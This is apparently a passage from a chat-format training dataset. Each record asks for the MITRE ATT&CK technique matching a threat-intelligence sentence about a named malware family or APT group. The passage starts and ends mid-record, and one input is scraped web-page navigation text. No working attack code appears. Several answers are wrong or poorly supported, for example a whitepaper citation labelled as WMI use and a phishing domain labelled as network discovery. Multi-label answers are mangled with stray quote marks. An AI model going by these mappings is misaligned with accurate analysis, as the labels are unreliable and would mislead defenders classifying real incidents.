. Hashes . macOS “cracked” applications (versions 1-3) . Windows “cracked” applications (version 4) . Linux images . Filenames . macOS . Windows . Hostnames . Download hosts (via HTTP on port 80) . Update hosts (via SCP) . Mining hosts . MITRE ATT&CK techniques . 20 Jun 2019 - 11:00AM . Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center . Newsletter . Similar Articles . ESET Research . Watering hole deploys new macOS malware, DazzleSpy, in Asia . Virus Bulletin: Old malware never dies – it just gets more targeted . Anatomy of native IIS malware . Some URL shortener services distribute Android malware, including banking or SMS trojans . Discussion" }, { "role": "assistant", "content": "T1569.001 - System Services: Launchctl" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke's miner has created UPX-packed files in the Windows Start Menu Folder." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL can create a remote shell and run a given command." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "installs itself as a new service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used a valid account to maintain persistence via scheduled task." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 created a RAR archive of targeted files for exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLATINUM is capable of using Windows hook interfaces for information gathering such as credential access." }, { "role": "assistant", "content": "T1056.004 - Input Capture: Credential API Hooking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is controlled via commands that are appended to image files." }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This is performed by checking if the following libraries are loaded on the victim machine.SbieDll.dll (sandboxie library)Dbghelp.dll (Microsoft debugging tools)Api_log.dll (threatAnalyzer / GFI SandBox)Dir_watch.dll (threatAnalyzer / GFI SandBox)We were able to uncover some other techniques used by this variant of ROKRAT to make analysis difficult, Group 123 used an anti-debugging technique related to NOP (No Operation).nop dword ptr [eax+eax+00h] is a 5 byte NOP" }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Janicab used a cron job for persistence on Mac devices." }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "From September to December 2018 the RTM group sent out more than 11,000 malicious emails. The cybercriminals, however, are not going to stop there, as evidenced by the new malicious campaigns that we track as part of our ongoing threat intelligence activities. Where do we begin our search. Let's start with simple things: we will take the NTUSER.DAT registry file with the latest modification date from the user directory (C:\\Users\\%username%\\), and extract data from it using RegRipper. In general, you do not have to stick to the Sleuth Kit at all; there are more convenient tools like FTK Imager, a free tool, which can be used not only to create forensic images, but also to examine their contents. Let's take a closer look at apg.exe and use PPEE: This looks like TeamViewer and is signed as TeamViewer, so does this mean it indeed is TeamViewer. Judging by the file's size, it has nothing to do with the original msi.dll, so it is clearly DLL Search Order Hijacking. The operating system starts searching for the necessary libraries from the current directory, which means that instead of the legitimate msi.dll, the one located in b7mg81 will be loaded. Another interesting file is TeamViewer.ini: Here is anti-forensics: according to the configuration file, our \"TeamViewer\" did not keep any logs, and was apparently used as a RAT (Remote Access Trojan). Well, not bad. I think what we can use the Sleuth Kit again" }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxxZ has collected the host name and operating system product name from a compromised machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has used cmd.exe likely as a password changing mechanism." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound used FireMalv, custom-developed malware, which collected passwords from the Firefox browser storage." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used AdFind to enumerate remote systems." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, and in the Program Files directory." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "injects into the Internet Explorer process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a batch file to kill a security program task and then attempts to remove itself." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has weaponized CHM files in their phishing campaigns." }, { "role": "assistant", "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains UAC bypass code for both 32- and 64-bit systems." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can capture session logon details from a compromised host." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has downloaded additional scripts and files from adversary-controlled servers. has also used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7." }, { "role": "assistant", "content": "T1546.012 - Event Triggered Execution: Image File Execution Options Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To establish persistence, Truvasys adds a Registry Run key with a value \"TaskMgr\" in an attempt to masquerade as the legitimate Windows Task Manager." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ConnectWise can record video on remote hosts." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This excellent whitepaper by William Ballenthin, Matt Graeber and Claudiu Teodorescu contains additional information on WMI offense, defense and forensics" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used multiple command-line utilities to enumerate running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dipsind encrypts C2 data with AES256 in ECB mode." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Impacket modules like ntlmrelayx and smbrelayx can be used in conjunction with Network Sniffing and LLMNR/NBT-NS Poisoning and SMB Relay to gather NetNTLM credentials for Brute Force or relay attacks that can gain code execution." }, { "role": "assistant", "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We did not observe the initial access for this case but assess with medium to high confidence that a malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document, the initial Qbot DLL loader was downloaded and saved to disk. Interestingly, the name of the DLL contained a .html extension to disguise the portable executable nature of the payload. Once executed, the Qbot process creates a scheduled task to elevate itself to system." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1204.002 - User Execution: Malicious File', 'T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has delivered spearphishing emails with malicious attachments to targets." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 have enumerated files and directories, or searched in specific locations within a compromised host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE stages the output from command execution and collected files in specific folders before exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack used hard-coded credentials to gain access to a network share." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "surveys a system upon check-in to discover remote systems on a local network using the net view and net view /DOMAIN commands." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "maintains access to victim environments by using to access as well as establishing a backup RDP tunnel by using ." }, { "role": "assistant", "content": "T1108 - Redundant Access" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TAINTEDSCRIBE can execute \"GetLocalTime\" for time discovery." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to obtain a listing of running processes (including loaded modules)." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used PowerSploit's Invoke-Kerberoast module to request encrypted service tickets and bruteforce the passwords of Windows service accounts offline." }, { "role": "assistant", "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has attempted to map to C$ on enumerated hosts to test the scope of their current credentials/context." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Windows can add a service named \"wind0ws\" to the Registry to achieve persistence after reboot." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the following capabilities" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery', 'T1518 - Software Discovery', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole has a command to list account information on the victim’s machine." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM has used a fronted domain to obfuscate its hard-coded C2 server domain." }, { "role": "assistant", "content": "T1090.004 - Domain Fronting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can retrieve files." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost. Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost" }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperBro has the ability to start and stop a specified service." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As with other adversaries that mine cryptocurrency opportunistically, Blue Mockingbird likes to move laterally and distribute mining payloads across an enterprise" }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has been known to brute force password hashes to be able to leverage plain text credentials." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains the execFile function to execute a specified file on the system using the NSTask:launch method." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has copied itself to and infected removable drives for propagation." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, HyperStack undergoes a similar registry key check to Turla’s RPC backdoor and updates the same registry key to determine which named pipes can be accessed anonymously. The HyperStack backdoor first copies itself to C:\\ADSchemeIntegrity.exe and then installs itself with system-level privileges as the service Active Directory Scheme Integrity Service. HyperStack checks for the following registry entry and, when found, adds the name of its communication pipe (‘adschemerpc’) to the key value" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can use a decryption algorithm for strings based on Rotate on Right (RoR) and Rotate on Left (RoL) functionality." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In previous attacks, we were able to determine the impacted organization based on the domain names and credentials used by the Disttrack tool to spread to other systems on the network. However, that functionality was missing from this sample. Unlike past Shamoon attacks, this particular Disttrack wiper would not overwrite files with an image. Instead it would overwrite the MBR, partitions, and files on the system with randomly generated data" }, { "role": "assistant", "content": "T1485 - Data Destruction" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim’s system regardless whether macros are enabled" }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Penquin has mimicked the Cron binary to hide itself on compromised systems." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak has a command to create a reverse shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On March 5, 2020, researcher Steven Seeley, published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can browse directories on a compromised host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has the \"curl\" and \"wget\" commands as well as batch scripts to download new tools." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to gather the victim's current directory." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FELIXROOT collects the username from the victim’s machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POLONIUM has created and used legitimate Microsoft OneDrive accounts for their operations." }, { "role": "assistant", "content": "T1583.006 - Web Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LaZagne can obtain credentials from chats, databases, mail, and WiFi." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "surveys a system upon check-in to discover information in the Windows Registry with the reg query command." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig can download remote files onto victims." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The mericcs.org domain was used as the sender address, as well as the hosting location of the malicious RTF document" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Note that the browser itself is not hooked. Executing the browser from any other Chrome shortcut link will start and run it normally without the malicious extension, canceling out the malware’s ability to control what the victim does" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The 's Information Gathering Tool (IGT) includes PowerShell components." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UBoatRAT can list running processes on the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user." }, { "role": "assistant", "content": "T1134.002 - Create Process with Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If a victim meets certain criteria, T9000 uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs – %APPDATA%\\Intel\\ResN32.dll\" and \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs – 0x1\"." }, { "role": "assistant", "content": "T1546.010 - Event Triggered Execution: AppInit DLLs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sykipot is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens." }, { "role": 